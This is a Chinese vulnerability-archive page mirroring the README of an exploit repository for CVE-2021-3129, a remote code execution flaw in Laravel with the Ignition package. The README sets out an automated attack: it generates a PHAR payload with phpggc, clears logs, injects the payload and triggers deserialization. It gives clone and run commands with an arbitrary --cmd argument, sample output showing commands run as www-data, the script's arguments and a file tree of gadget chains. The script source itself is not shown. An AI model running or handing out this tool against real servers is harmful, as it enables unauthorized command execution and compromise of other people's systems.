关联漏洞
描述
CVE-2021-3129 Laravel Ignition RCE Exploit
介绍
# CVE-2021-3129 Laravel Ignition RCE Exploit
This is a Python exploit script for CVE-2021-3129, a remote code execution vulnerability in Laravel when the Ignition package is installed. This vulnerability allows an attacker to execute arbitrary system commands via PHAR deserialization.
## Features
- Automatically generates the PHAR payload using `phpggc`
- Accepts user input for any command to execute (e.g., `id`, `whoami`, etc.)
- Automates the entire exploitation process, including clearing logs, injecting the payload, converting logs to PHAR, and triggering the deserialization
## Prerequisites
- Python 3.x
- `requests` library
- PHP installed on your system
- [phpggc](https://github.com/ambionics/phpggc) installed (for generating PHAR payloads)
## Installation
1. Clone the repository:
```bash
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
```
2. Install required Python packages:
```bash
pip install requests
```
3. Run the script with the desired target and command:
```bash
python3 CVE-2021-3129.py http://example.com --cmd 'id'
```
Example output:
```bash
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
```
## Arguments
- `target` (required): The URL of the vulnerable Laravel application.
- `--cmd` (optional): The command to be executed on the target (default: `whoami`).
- `--log_path` (optional): The log file path to be used (default: `../storage/logs/laravel.log`).
## POC
文件快照
[4.0K] /data/pocs/a9736c8098a7e0f8a5af044f2e6b6e210c7430e8
├── [4.0K] CVE-2021-3129.py
├── [ 393] Dockerfile
├── [4.0K] gadgetchains
│ └── [4.0K] Monolog
│ ├── [4.0K] FW
│ │ └── [4.0K] 1
│ │ ├── [ 669] chain.php
│ │ └── [1.1K] gadgets.php
│ └── [4.0K] RCE
│ ├── [4.0K] 1
│ │ ├── [ 610] chain.php
│ │ └── [ 786] gadgets.php
│ ├── [4.0K] 2
│ │ ├── [ 593] chain.php
│ │ └── [ 864] gadgets.php
│ ├── [4.0K] 3
│ │ ├── [ 532] chain.php
│ │ └── [ 937] gadgets.php
│ ├── [4.0K] 4
│ │ ├── [ 899] chain.php
│ │ └── [1.8K] gadgets.php
│ ├── [4.0K] 5
│ │ ├── [ 517] chain.php
│ │ └── [ 744] gadgets.php
│ ├── [4.0K] 6
│ │ ├── [ 520] chain.php
│ │ └── [1.1K] gadgets.php
│ ├── [4.0K] 7
│ │ ├── [ 721] chain.php
│ │ └── [ 396] gadgets.php
│ ├── [4.0K] 8
│ │ ├── [ 624] chain.php
│ │ └── [1.1K] gadgets.php
│ └── [4.0K] 9
│ ├── [ 607] chain.php
│ └── [ 787] gadgets.php
├── [4.0K] lib
│ ├── [1.5K] diagnose_payload.php
│ ├── [4.0K] PHPGGC
│ │ ├── [4.0K] Enhancement
│ │ │ ├── [2.2K] ASCIIStrings.php
│ │ │ ├── [ 290] Enhancement.php
│ │ │ ├── [ 541] Enhancements.php
│ │ │ ├── [2.3K] FastDestruct.php
│ │ │ ├── [ 802] PlusNumbers.php
│ │ │ └── [1.4K] Wrapper.php
│ │ ├── [ 69] Exception.php
│ │ ├── [4.0K] GadgetChain
│ │ │ ├── [ 670] FileDelete.php
│ │ │ ├── [ 703] FileInclude.php
│ │ │ ├── [ 727] FileRead.php
│ │ │ ├── [1.4K] FileWrite.php
│ │ │ ├── [ 593] PHPInfo.php
│ │ │ ├── [4.0K] RCE
│ │ │ │ ├── [ 472] Command.php
│ │ │ │ ├── [ 571] FunctionCall.php
│ │ │ │ └── [ 587] PHPCode.php
│ │ │ ├── [1.1K] RCE.php
│ │ │ ├── [ 459] SqlInjection.php
│ │ │ └── [ 458] SSRF.php
│ │ ├── [5.8K] GadgetChain.php
│ │ ├── [ 80] InvalidArgumentsException.php
│ │ ├── [4.0K] Phar
│ │ │ ├── [2.9K] Format.php
│ │ │ ├── [ 325] Phar.php
│ │ │ ├── [4.1K] Tar.php
│ │ │ └── [ 155] Zip.php
│ │ └── [1.7K] Util.php
│ ├── [ 27K] PHPGGC.php
│ └── [1.1K] test_payload.php
├── [ 247] phpggc
├── [4.0K] POC
│ ├── [ 25K] 1.png
│ └── [ 61K] 2.png
├── [1.8K] README.md
└── [4.0K] templates
├── [ 246] chain.php
└── [ 7] gadgets.php
22 directories, 56 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。